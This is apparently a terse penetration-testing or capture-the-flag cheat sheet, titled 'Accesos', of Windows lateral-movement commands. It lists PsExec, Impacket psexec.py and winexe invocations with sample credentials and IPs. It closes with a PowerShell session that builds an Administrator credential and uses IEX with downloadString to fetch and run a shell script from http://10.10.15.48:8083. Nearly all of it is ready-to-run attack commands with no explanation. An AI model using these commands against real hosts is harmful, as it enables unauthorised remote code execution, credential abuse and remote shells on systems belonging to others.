Accesos

PsExec.exe -i -s \\<IP> -u <domain name>\<username> -p <password> cmd
o
PsExec.exe \\<IP local> -u <domain name>\<username> -p <password> "command"

- python3 /usr/share/doc/python3-impacket/examples/psexec.py "internal/admin_master:Walking123@"@192.168.18.45 

- /usr/bin/winexe --user=internal/admin_master%Walking123@ //192.168.18.45 'ipconfig'

PS C:\inetpub\wwwroot\internal-01\log> $username = "BART\Administrator"
PS C:\inetpub\wwwroot\internal-01\log> $password = "3130438f31186fbaf962f407711faddb"
PS C:\inetpub\wwwroot\internal-01\log> $secstr = New-Object -TypeName System.Security.SecureString
PS C:\inetpub\wwwroot\internal-01\log> $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
PS C:\inetpub\wwwroot\internal-01\log> $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
PS C:\inetpub\wwwroot\internal-01\log> Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/shell.ps1') } -Credential $cred -Computer localhost